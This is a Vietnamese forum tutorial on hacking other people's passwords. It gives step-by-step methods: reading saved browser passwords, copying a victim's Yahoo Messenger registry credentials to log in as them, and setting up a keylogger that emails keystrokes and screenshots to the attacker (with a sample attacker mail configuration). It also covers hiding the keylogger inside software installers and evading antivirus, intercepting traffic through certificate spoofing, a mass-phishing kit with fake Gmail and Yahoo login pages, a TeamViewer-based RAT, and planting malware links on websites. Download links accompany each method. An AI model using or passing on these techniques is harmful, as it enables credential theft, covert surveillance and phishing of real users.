I – Exploit password được lưu lại trên các trình duyệt:
Hacker
thường lợi dụng thói quen của người dùng internet thường lưu lại
password các tài khoản để lần sau đăng nhập dễ hơn. Khi có quyền điều
máy tính victim, password có thể bị lấy như sau:
- Đối với firefox password được lưu lại theo đường dẫn:
tool -> options ->security -> save password s-> show password
- Đối với IE hoặc chrome (cả firefox nữa) ta có thể dùng tool sau:
http://www.mediafire.com/download.php?ncy4qnx4vj4ukz5II – Password yahoo messenger được lưu lại:
Bạn vào run: regedit
Sau đó vào theo đường dẫn: HKEY_CURRENT_USER -> software -> yahoo ->paper
Click
vào “paper”, bạn nhìn sang khung bên trái , ở cột name, bạn chú ý 2 mục
có tên: “ETS” và “Yahoo! User ID”. Ta sang bên cột data()
+ ETS : chính là password ở dạng mã hóa
+ Yahoo! User ID: Chính là nickname yahoo
Vậy ta có thể làm được gì: Hình thức mã hóa này tôi chưa giải mã được.
Nhưng
nếu coppy đoạn mã hóa password (ETS) từ máy của victim rồi thay vào máy
của mình và thay cả nickname yahoo của victim vào “ Yahoo! User ID”,
thì lúc khởi động, nickname của victim sẽ đăng nhập tự đông trên máy của
mình.
III – Sử dụng phần mền gián điệp keylogger:
Đó là hình thức ghi lại mọi hoạt động trên bàn phím của victim sau đó gửi về mail của hacker
Trong quá trình sử dụng, tôi thích nhất là perfect keylogger
Chức năng: Ghi lại mọi thao tác bàn phím,những trang web đã vào, chụp ảnh màn hình destop rồi gửi về mail của hacker
Cách sử dụng: Bạn có thể search trên google. Riêng có 1 lưu ý, đó là khi thiết lập địa chỉ mail gửi về bạn nên chọn mail aol
Ví dụ cấu hình mail:
send to :
t_z1412@aol.comSmtp : smtp.aol.com
Username: t_z1412
Password: ***********
Key perfect logger có 2 phiên bản 1.68 và 1.75. Điểm khác nhau:
+
1.68: có khả năng tạo tao ra virus (Chính là con keylogger mà hacker đã
thiết lập) và đính kèm vào phần mền. Khi người dùng cài phần mền đó thì
keylogger cũng vô tình cũng cài trên máy đó luôn.
Link download full:
http://www.mediafire.com/download.php?w66lnwwc0ym43o5+
1.75: Mạnh hơn 1.68 có thể qua mặt nhiều phần mền antivirus khi nó đã
được cài đặt trên máy tính victim. Nhưng không có khả năng tạo virus
đính kèm vào phần mền như 1.68
Link download full:
http://www.mediafire.com/download.php?6eggr1osqk3lpb7Video hướng dẫn sử dụng:
Link download:
http://www.mediafire.com/download.php?z47hd51dx2wm0xwIV – Giải mã ký tự password bị ẩn dưới dạng : *******
Vô tình bạn thấy password gmail và yahoo của victim ở dạng ***** nó bị ẩn đi và bạn muốn đọc các ký tự đó:
Link down load:
http://www.mediafire.com/download.php?v39svua5300mif2V- Sử dụng kỹ thuật giả mạo certificate:
Đây
là một kỹ thuật rất hay, sử dụng hướng luồng thông tin đi qua cổng
proxy đã được thiết lâp trên máy của hacker. Chính vì vậy hacker sẽ có
toàn bộ thông tin của victim được gửi trên internet bao gồm cả những
thông tin nhạy cảm.
Kỹ thuât này do anh “tocbatdat – giảng viên CEH trung tâm I-TRAIN” viết
Link download toàn bộ tool và tài liệu hướng dẫn:
http://www.mediafire.com/download.php?igs3x7n3eeiq3g1Bao gồm:
+) burp suite v1.3
+) Quick_Batch_File_Compiler_3.21
+) Java bổ trợ
+) Đoạn mã thiết lập proxy tự động trên giao diện IE
+)Tài liệu hướng dẫn chi tiết được viết bởi anh tocbatdat
VI – Sử dụng kỹ thuật giả danh google hoặc yahoo:
Bộ tool đầy đủ :
+) Tool thu thập địa chỉ mail trên các diễn đàn rồi export ra dạng file text.( bao gồm cả key bản quyền.)
Link download:
http://www.mediafire.com/download.php?52uyypvas9htv2j+)Tool gửi mail hàng loạt. tầm 10.000 mail/ 1 buổi sáng
Link download:
http://www.mediafire.com/download.php?l1klrncqv3je3q0+) Site face login gmail và yahoo:
Đây
là website giả mạo mà giao diện giống site đăng nhập của gmail và
yahoo) mà khi victim đăng nhập vào thông tin mail và pass trên site đó
sẽ được gửi về địa chỉ mail của hacker.
Link download:
*.Tóm
lại, hacker sẽ dùng những tool trên và giả danh goolge hay yahoo rồi gửi
mai cho victim yêu cầu click vào đường link để kiểm tra tính xác thực
của các tài khoản, mục đích là để loại bỏ những tài khoản ảo không có
người dùng và nếu vicim không xác nhận, tài khoản đó sẽ bị khóa vĩnh
viễn.
+Video hướng dẫn sử dụng:
Link download:
Một số tut tham khảo:
1. Đột nhập máy tinh qua teaview rat:
-
Teamview rat được các phát triển dựa phần mền điều khiển máy tính người
khác: teamview. Nó được tạo ra dưới dạng file .exe, khi victeam click
vào thì phần mền teamview được cài đặt ở chế độ ẩn trên máy của victeam
và gửi ID,pass về cho hacker.
- Sau đó hacker sử dụng phần mền teamview bình thường điều khiển victeam mà họ vẫn không hề hay biết.
Link Down:
http://downloadus1.teamviewer.com/do...r_Setup_vi.exeLinkdown Teamview Rat :
http://www.mediafire.com/download.php?x9b78u17hvkd44tVideo hướng dẫn :
http://www.mediafire.com/download.php?cl4d6g7dju4v7la+)
Bạn nên tao ra teaview rat trên win xp, tôi tạo ra trên win 7 thì nó
thường chỉ gửi ID về mà không gửi pass, nếu có gửi thì pass cũng thường
bị lỗi.
+) Victeam dùng xp, win 7, hay lap đều dính chưởng như nhau cả
+)Không
vượt qua được các phần mền anti mạnh , nhưng nếu nó đã kích hoạt được
trên máy thì 1 số anti hok mạnh sẽ hok làm gì được.
2. Tool hướng dẫn đính kèm virus lên các website:
bao gồm:
+)Mã Code gắn link lên code nguồn của website
+)Video hướng dẫn sử dụng
Link download:
http://www.mediafire.com/download.php?4btmoy5456vqa7gTôi
viết bài tut này mong được chia sẻ với những bạn chưa biết và học hỏi ở
các bậc tiền bối các kỹ thuật hack password, không khuyến cáo các bạn
sử dụng nó để xâm phạm quyền riêng tư của người khác.